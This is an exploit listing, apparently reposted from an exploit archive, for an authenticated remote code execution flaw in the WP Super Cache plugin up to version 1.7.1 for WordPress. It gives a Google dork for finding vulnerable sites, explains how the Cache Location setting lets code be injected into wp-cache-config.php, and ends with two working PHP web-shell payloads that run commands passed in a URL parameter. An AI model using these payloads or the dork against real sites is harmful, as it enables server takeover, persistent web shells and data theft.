WordPress Plugin WP Super Cache 1.7.1 – Remote Code Execution (Authenticated) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 29th, 2021 📆 | 6915 Views ⚑

0

WordPress Plugin WP Super Cache 1.7.1 – Remote Code Execution (Authenticated)

# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: < = 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/### -- [ Info: ][i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.[i] Another possible attack vector: from XSS to RCE.### -- [ Impact: ][~] Full compromise of the vulnerable web application and also web server.### -- [ Payloads: ][$] ';system($_GET[13]);include_once 'wp-cache-config.php';'[$] ';`$_GET[13]`;include_once 'wp-cache-config.php';?>